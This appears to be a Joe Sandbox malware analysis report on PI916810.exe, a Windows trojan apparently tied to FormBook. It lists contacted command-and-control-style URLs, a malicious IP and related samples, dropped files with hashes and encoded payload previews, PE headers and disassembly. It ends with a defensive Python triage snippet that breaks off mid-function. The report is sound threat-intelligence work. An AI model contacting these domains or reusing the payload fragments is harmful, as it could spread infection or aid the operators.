                                                                                                                                                    http://www.wner-nyquh.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.ood-packaging-jobs-brasil.todayexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://www.ithin-ksvodn.xyz/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.4489526036.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2046728721.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.azl.pro/ge07/www.ithin-ksvodn.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.g18q11a.top/ge07/www.rowadservepros.netexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.zoc-marriage.xyzReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.yegle.netexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.ood-packaging-jobs-brasil.today/ge07/explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://api.msn.com/explorer.exe, 00000003.00000002.4492745414.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.yegle.net/ge07/www.wner-nyquh.xyzexplorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://crl.vexplorer.exe, 00000003.00000002.4486573997.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2044763297.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.yegle.netReferer:explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.zoc-marriage.xyz/ge07/explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
199.59.243.227 | 94950.bodis.com | United States | | 395082 | BODIS-NJUS | true
                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                          Analysis ID:1548156
                                                                                                                                                                          Start date and time:2024-11-04 03:13:10 +01:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 10m 5s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:PI916810.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.evad.winEXE@301/5@12/1
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 61
• Number of non-executed functions: 266
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: PI916810.exe
Time | Type | Description
21:14:22 | API Interceptor | 7653113x Sleep call for process: explorer.exe modified
21:14:45 | API Interceptor | 6948846x Sleep call for process: WWAHost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
199.59.243.227 | IMPORT PERMITS.exe | malicious | FormBook | www.deepfy.xyz/t7p4/
 | WER9Fz381n.exe | malicious | Glupteba | ww82.trythisgid.com/
 | SALES ORDER875.exe | malicious | FormBook | www.9net88.net/ge07/?AZFdK=5jGt1VUhS4spDnR&bb=rInKjcPO3O96ojanc4NFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tP8faITl6ID
 | draft contract for order #782334.exe | malicious | FormBook | www.deepfy.xyz/t7p4/
 | VkTNb6p288.exe | malicious | FormBook | www.662-home-nb.shop/90v4/
 | NF_Payment_Ref_FAN930276.exe | malicious | FormBook | www.rebel.tienda/7n9v/
 | SWIFT.exe | malicious | FormBook | www.migraine-massages.pro/ym43/?1Do0qp=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRaIpZZY1Y+O2jmybRXdJyK6xs6rkJOg==&yNNX=snRp
 | #10302024.exe | malicious | FormBook | www.migraine-massages.pro/ym43/
 | 18in SPA-198-2024.exe | malicious | FormBook | www.rebel.tienda/7n9v/
 | WARUNKI UMOWY-pdf.bat.exe | malicious | FormBook, GuLoader | www.allforai.xyz/puo4/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
94950.bodis.com | SALES ORDER875.exe | malicious | FormBook | 199.59.243.227
 | Invoice & Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
 | Invoice Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
 | Invoice Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
 | OVERDUE BALANCE.exe | malicious | FormBook | 199.59.243.227
 | PO23100072.exe | malicious | FormBook | 199.59.243.227
 | PO-000001488.exe | malicious | FormBook | 199.59.243.227
 | Enquiry.exe | malicious | FormBook | 199.59.243.227
 | Amended Proforma #U2013 SMWD5043.exe | malicious | FormBook | 199.59.243.227
 | RECIEPT.PDF.exe | malicious | FormBook | 199.59.243.227
Match | Associated Sample Name / URL | Detection | Threat Name | Context
BODIS-NJUS | IMPORT PERMITS.exe | malicious | FormBook | 199.59.243.227
 | debug.elf | malicious | Unknown | 199.59.243.227
 | hi.elf | malicious | Unknown | 199.59.243.227
 | WER9Fz381n.exe | malicious | Glupteba | 199.59.243.227
 | SALES ORDER875.exe | malicious | FormBook | 199.59.243.227
 | draft contract for order #782334.exe | malicious | FormBook | 199.59.243.227
 | VkTNb6p288.exe | malicious | FormBook | 199.59.243.227
 | NF_Payment_Ref_FAN930276.exe | malicious | FormBook | 199.59.243.227
 | SWIFT.exe | malicious | FormBook | 199.59.243.227
 | #10302024.exe | malicious | FormBook | 199.59.243.227
No context
No context
Process: C:\Windows\explorer.exe
File Type: JSON data
Category: dropped
Size (bytes): 1022
Entropy (8bit): 5.252542495586483
Encrypted: false
SSDEEP: 24:YqHZ6T06Mhm50mMb0O0bihm5TmM6CUXyhm5+dmMbxdB6hm5CUmMz0Jahm5gmMbNS:YqHZ6T06McbMb0O0bicMMDUXycRMbxdy
MD5: 2F99BED9FF8C41AFEE96B028ED8B86A2
SHA1: BF4E91361EE28C5506E812F2BF8C3495676097B0
SHA-256: F4C2EB86983ED94B60DD5041C9DDCCC2E06C9F4DD810A8D90FBCCAE82620741C
SHA-512: 834B9B236AF231632E106CAE3E2F22EF09B2445E64536C7FF0F2F61BC240AFA84BB66093135B317A227B3E2D9BBCAA1EDFE65F87483CB3C12F67C3E80E5A436C
Malicious: false
Reputation: moderate, very likely benign file
Preview: {"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2357654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2347654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2337654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2327654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2317654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2307654912,"LastSwitchedHighPart":31061703,
Process: C:\Users\user\Desktop\PI916810.exe
File Type: data
Category: dropped
Size (bytes): 181950
Entropy (8bit): 7.98391881152223
Encrypted: false
SSDEEP: 3072:2JxTKj+wW32a19Y5VhDvr7B8nBHyK4ZrVqMlOWzMRy6hiOyGGD0gA6DlqU:2JxTDwW3L19Y9Dz7wBSKgRhy1WD0gA+X
MD5: 18AD59E334ECE56028082F66A39F660B
SHA1: FE62A3F2EA46432F180C5C9981C8C3C070F83FC5
SHA-256: 407EF06E8F0FD2E7E2951853280E56C4E447BC7C6116C1B612819D778955521D
SHA-512: 4EAD7C5DC15DAEEBAA62438D39BEE6D4FDD33D3B137682C13865DE039F638A6E9474C62851A05F30B01D4042116FF41A06CF6A8B48005081D2A5811232DC86C3
Malicious: false
Reputation: low
                                                                                                                                                                          Preview:EA06......`6].N.U.@y.*.O...C:s:?...U.Zmg*.X.Mi....7...5.mh.K.@.".E....?....(..G*..3z.._].T$....Au.O-..4.)\.D#..^k<.L,.J.B..........%....k...%..d.....^..gk...jX...G..j..4.S1.$@$>8.vi5.Lk3=."c....RkL...T.c.V.....Y..$.....$D..I(.A1.M.:..%V.M@...T.p.lM...bgT..(`.Mv.S..?b........VIl.E'..3^....0...(...Vi.../.8.K...................p./...1....2^_.Y$.o%..'z.U..7u.....O...4;/..b....8.g.......Vh..._%..O...u.....5uZWc_..i.M|....a.......Ts=+$.q...[l..a.q.y-..{..t.\.._%...4..*....;..Jq..k.J..UY..y[..c..v..V.B.`j..&..S..(.O)...`U.w.i:.v.@..N..W...8.Zj`.U..j..-..._.$....--N...Q.;.f.X.x....sa.....M."a..T;p...7L.U{?....<.Q.].nSCA....?o.K .^.{..[........?.@.x.WKk.....g.%...=*..%...4..-+......D..h..j1>......7.....d..5.j..+..Gv....a....}..?I..j...wY.Ef}.......u.].y..tn...W_g.pt.*......<S ....j;......o.5m.G.i..;.}........5S...V{..,.....t.....P{.-n.U..l.....m..I3..gOm..L....[.f..H.......w...4....Lc.....C..2...sc..V`..-.I....t.,...W.P.... ....n...y...%....w
Process: C:\Users\user\Desktop\PI916810.exe
File Type: data
Category: dropped
Size (bytes): 14528
Entropy (8bit): 7.6299997798782115
Encrypted: false
SSDEEP: 384:FTYznwnjovkuyDTqCo1JTglf78Uqf7Nam92Woz:FAwnjoVEmCS8lO00E
MD5: 809D4BD2AEC5174BD9901BEF5620BA18
SHA1: 8EE6801FBE77D857742F7C4870F72E883F7EC586
SHA-256: F291D47C92ECA6A6573DEF545CE1B5E049CB04608942ADBE303EEA8798CD2C1C
SHA-512: 58BEEDC4DAEAE2233F55A4BAC19314DCA75947EE0C3EB611191EAEAE34EE4CD32CA6B384FE98D88C899BD8D19FAFEA7587A4779AA39E565F298D02F3EE358480
Malicious: false
Reputation: low
                                                                                                                                                                          Preview:EA06..0...&.i..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
Process: C:\Users\user\Desktop\PI916810.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 143378
Entropy (8bit): 2.8384968843350653
Encrypted: false
SSDEEP: 192:en/SvruY7XdqMWTConYo9/W+UW5xoURoN/WtAWmPzNW/YKM2nRSn1Dq/M1WShL1x:N
MD5: E89C37A64A5817A52FD2C79A99FE5C58
SHA1: 217710409579F22112781E2E4BAAC10B36A735DC
SHA-256: 1507CDF69807B5C3304BCCACEE0075D05E03E4A071651E28DEE903BA1BF378BC
SHA-512: EF675FB573911B88F4461D1AC080C718989055250D2C8FE849F32581A16CE6AE515BD7CEFCF8543FC23CC6003D7B260B7047BA234EFC77563578CB0ACBD6B091
Malicious: false
Reputation: low
                                                                                                                                                                          Preview:gh5f0gh5fxgh5f5gh5f5gh5f8gh5fbgh5fegh5fcgh5f8gh5f1gh5fegh5fcgh5fcgh5fcgh5f0gh5f2gh5f0gh5f0gh5f0gh5f0gh5f5gh5f6gh5f5gh5f7gh5fbgh5f8gh5f6gh5fbgh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5f5gh5f8gh5f4gh5fbgh5f9gh5f6gh5f5gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5fdgh5f8gh5f6gh5fbgh5fagh5f7gh5f2gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f5gh5f5gh5f8gh5f8gh5fbgh5f8gh5f6gh5fegh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5f5gh5f8gh5fagh5fbgh5f9gh5f6gh5f5gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5fdgh5f8gh5fcgh5fbgh5fagh5f6gh5fcgh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f5gh5f5gh5f8gh5fegh5fbgh5f8gh5f3gh5f3gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5f5gh5f9gh5f0gh5fbgh5f9gh5f3gh5f2gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5fdgh5f9gh5f2gh5fbgh5fagh5f2gh5fegh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f5gh5f5gh5f9gh5f4gh5fbgh5f8gh5f6gh5f4gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9
Process: C:\Users\user\Desktop\PI916810.exe
File Type: data
Category: dropped
Size (bytes): 189440
Entropy (8bit): 7.864655781501552
Encrypted: false
SSDEEP: 3072:L8qgzjPdo4DJZ6O8tStUs+ZQm/PVbF+XLtbqhxI3RcC4nLhoP67YgBmrYThlk1qJ:wqgfdo49ZEStUYmHVhqLMfC4Lho0pmYX
MD5: 273155CE7EC43D57266A25EFE02E28C5
SHA1: B053CDCDC1416F65D6A6898842EBEE465AD31436
SHA-256: 6EB73F48F59381DBD0D692CD28AC3C39F8B5071B6DD2A36B61CE435BB75B4375
SHA-512: E53260EA46E0426E07244D949E1837881385CB7A73662516F020AA976F1EAF9F0335BB1B78CED1D1C20CEBA2C63343DEC15D069539450367B8D941213C9CDBF2
Malicious: false
Reputation: low
                                                                                                                                                                          Preview:.i.e.STUJ..Z......3G..|VB...SX45N0X3D7XSTUJYMZSX45N0X3D7XS.UJYCE.V4.G.y.E{.r.=#*m*!7SG/]xP%Y6< u(<m(&6.\ ..|..5<00dT@PwX45N0X3..P...,..5..(..3....2.Y...R..0....>..<)1..5.45N0X3D7XSTUJYMZ..45.1Y3..1.TUJYMZSX.5L1S2N7X.VUJYMZSX45>.Y3D'XST.HYMZ.X4%N0X1D7]SUUJYMZVX55N0X3D.ZSTWJYMZSX65..X3T7XCTUJY]ZSH45N0X3T7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUd-("'X45..Z3D'XST.HYMJSX45N0X3D7XSTUjYM:SX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJY
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.995890202173755
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: PI916810.exe
File size: 1'352'192 bytes
MD5: dc96f5ae5ade3e42324fa9c34bc6a43d
SHA1: 4a882ad9ad5e3c18635c6bcebd829c7f5e4d503a
SHA256: 63cfb08a37c680b7bd8c3a16340a69f92e1837b9ec57104e1f826c675316e278
SHA512: a397f4ee242077bb177eea07d195c5033c4e14c27484d5656a9cc525b5032d76e2509b5f16376bde4c30af9e65dc297dc94cce81f7ca47304e6644fc05bd29ca
SSDEEP: 24576:BAHnh+eWsN3skA4RV1Hom2KXFmIa69tlBWnMvZrcYqv89P5:Yh+ZkldoPK1Xa6/jWnwmYt
TLSH: FA55BE026B9D9066FF6AA0339B25E26646787C65537384AF33D81D7B78742F1133E232
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
Icon Hash: c58ee08c9594cd55
Entrypoint: 0x42800a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x672805DC [Sun Nov 3 23:23:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007FE3A53FE97Dh
jmp 00007FE3A53F1734h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FE3A53F18BAh
cmp edi, eax
jc 00007FE3A53F1C1Eh
bt dword ptr [004C41FCh], 01h
jnc 00007FE3A53F18B9h
rep movsb
jmp 00007FE3A53F1BCCh
cmp ecx, 00000080h
jc 00007FE3A53F1A84h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FE3A53F18C0h
bt dword ptr [004BF324h], 01h
jc 00007FE3A53F1D90h
bt dword ptr [004C41FCh], 00000000h
jnc 00007FE3A53F1A5Dh
test edi, 00000003h
jne 00007FE3A53F1A6Eh
test esi, 00000003h
jne 00007FE3A53F1A4Dh
bt edi, 02h
jnc 00007FE3A53F18BFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FE3A53F18C3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FE3A53F1915h
bt esi, 03h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD5 build 40629
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD5 build 40629
Name                                  | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT          | 0xbc0cc         | 0x17c        | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        | 0xc8000         | 0x7faa4      | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY        | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC       | 0x148000        | 0x7134       | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           | 0x92bc0         | 0x1c         | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS             | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     | 0xa4b50         | 0x40         | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT             | 0x8f000         | 0x884        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED        | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy            | Characteristics
.text  | 0x1000          | 0x8dfdd      | 0x8e000  | 310e36668512d53489c005622bb1b4a9 | False    | 0.5735602580325704  | data      | 6.675248351711057  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000         | 0x2fd8e      | 0x2fe00  | f006ab74d3c653b5c5a6cc0c77a171a2 | False    | 0.32829838446475196 | data      | 5.7632462979925245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0xbf000         | 0x8f74       | 0x5200   | aae9601d920f07080bdfadf43dfeff12 | False    | 0.1017530487804878  | data      | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0xc8000         | 0x7faa4      | 0x7fc00  | 71897041cba97dfe4ec33f8e54c7ca3e | False    | 0.6903417777641878  | data      | 7.279300196547012  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x148000        | 0x7134       | 0x7200   | f04128ad0f87f42830e4a6cdbc38c719 | False    | 0.7617530153508771  | data      | 6.783955557128661  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
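Added example, not code from the report or from Joe Sandbox: a stdlib-only Python triage over the static fields listed above, written for this page. The constants are copied from the report (image base, entrypoint, TimeDateStamp, the empty SECURITY directory and the section table); the functions map the entrypoint virtual address to its section, decode the timestamp, recompute 8-bit Shannon entropy and a zlib compression ratio for arbitrary bytes, and flag sections that are high entropy, writable and executable, or have no raw data behind them. The compression ratio is only an analogue of the report's ZLIB Complexity column, whose exact definition the page does not give, and the 7.0 entropy threshold is an assumption.

```python
import math
import zlib
from datetime import datetime, timezone

# Static fields copied from the report for PI916810.exe.
IMAGE_BASE = 0x400000
ENTRYPOINT = 0x42800a       # "Entrypoint" (virtual address)
TIMESTAMP = 0x672805DC      # "Time Stamp" (IMAGE_FILE_HEADER.TimeDateStamp)
SECURITY_DIR_SIZE = 0x0     # IMAGE_DIRECTORY_ENTRY_SECURITY size (Authenticode blob)

# Section table as listed in the report: name, virtual address, virtual size,
# raw size, reported 8-bit entropy and characteristic flag names.
SECTIONS = [
    dict(name=".text",  va=0x1000,   vsize=0x8dfdd, raw=0x8e000, entropy=6.675248351711057,
         flags={"IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ"}),
    dict(name=".rdata", va=0x8f000,  vsize=0x2fd8e, raw=0x2fe00, entropy=5.7632462979925245,
         flags={"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"}),
    dict(name=".data",  va=0xbf000,  vsize=0x8f74,  raw=0x5200,  entropy=1.1963819235530628,
         flags={"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ", "IMAGE_SCN_MEM_WRITE"}),
    dict(name=".rsrc",  va=0xc8000,  vsize=0x7faa4, raw=0x7fc00, entropy=7.279300196547012,
         flags={"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"}),
    dict(name=".reloc", va=0x148000, vsize=0x7134,  raw=0x7200,  entropy=6.783955557128661,
         flags={"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_DISCARDABLE", "IMAGE_SCN_MEM_READ"}),
]


def section_for_va(va, sections=SECTIONS, image_base=IMAGE_BASE):
    """Name of the section whose in-memory span contains the virtual address, or
    None (the PE headers before the first section belong to no section)."""
    rva = va - image_base
    for s in sections:
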